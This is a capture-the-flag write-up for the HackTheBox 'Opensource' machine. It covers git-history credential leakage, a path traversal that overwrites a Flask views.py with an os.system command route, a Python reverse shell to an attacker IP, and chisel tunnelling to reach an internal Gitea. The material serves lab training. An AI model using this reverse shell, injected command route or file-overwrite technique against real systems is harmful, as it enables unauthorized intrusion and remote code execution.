HackTheBox Opensource Write up

 

 

We Start with scaning with Nmap

❯ nmap 10.10.11.164
Nmap scan report for 10.10.11.164
PORT      STATE SERVICE
22/tcp   open     ssh
80/tcp   open     http
3000/tcp filtered ppp

There's port 80 open if we go to URL on browser we will saw website with source download.

after unzip it we see source folder with .git in the folder.

We can do a little bit recon with git command to see what we can get.

as we can see we saw an username password on it.

❯ git branch
  dev
  public
❯ git log dev --oneline
c41fede (dev) ease testing
be4da71 added gitignore
a76f8f7 updated
ee9d9f1 initial
❯ git show a76f8f7
commit a76f8f75f7a4a12b706b0cf9c983796fa1985820
    updated
+ "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
+ "http.proxy": "http://dev01:Soulless_Developer#2022@10.10.10.128:5187/",
+ "http.proxyStrictSSL": false

Now take look in app/app/ there is a view.py file that the one store the functions.

when we look in file_url=request.host_url + "uploads/" +file_name

it have path traversal in upload page if we intercept it in burpsuite.

We can perform path traversal with url-encode this string  ..//..//..//..//..//etc/passwd

We will got this when click on file in /upload.

After this i try to add another app.route to get reverse shell by add this line of code in view.py

@app.route('/kira')
def cmd():
    return os.system(request.args.get('cmd'))

After add this code in view.py i try to upload in 10.10.11.164/upload and intercept in burp to change filename"..//app/app/views.py" and we success uploaded our views.py file

To get reverse shell on our terminal i use https://www.revshells.com 

Open our browser to http://10.10.11.164/kira?cmd= and past the reverse shell after cmd=

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Open Netcat to Listen your reverse port before hit enter on the url.

❯ sudo netcat -lvnp 4444
Connection received on 10.10.11.164
/app # whoami
root
/app # ifconfig
          inet addr:172.17.0.5

As we see in Nmap there an port 8000 has been filltered. but now we can have shell as root in container. so there an tool name chisel can relay the traffic with sigle file execute. we need to upload it in to HTB server using wget. then follow my command.

On attacker machine

❯ chisel server --reverse --port 8000
2022/06/09 14:33:07 server: Reverse tunnelling enabled
2022/06/09 14:33:07 server: Listening on http://0.0.0.0:8000
2022/06/09 14:37:20 server: session#1: tun: proxy#R:3000=>172.17.0.1:3000: Listening

On victim machine

/app # ./chisel client 10.10.14.2:8000 R:3000:172.17.0.1:3000
2022/06/09 19:37:20 client: Connecting to ws://10.10.14.2:8000
2022/06/09 19:37:21 client: Connected

When we access our local:3000 on browser we will get gitea panel, we can login it with credentials we found in recon is dev01:Soulless_Developer#2022.

we got id_rsa key to access ssh to get user.txt flag by command :

❯ ssh dev01@10.10.11.164 -i id_rsa
dev01@opensource:~$ cat user.txt
dd7************************ff6
dev01@opensource:~$

After we need to bypass to root user to get another flag, we can use linPEAS or pspy by upload it to ssh server of victim.

We will rooted the machine!!!!

dev01@opensource:/tmp$ cat /tmp/tmp.txt 
1e******************a
dev01@opensource:/tmp$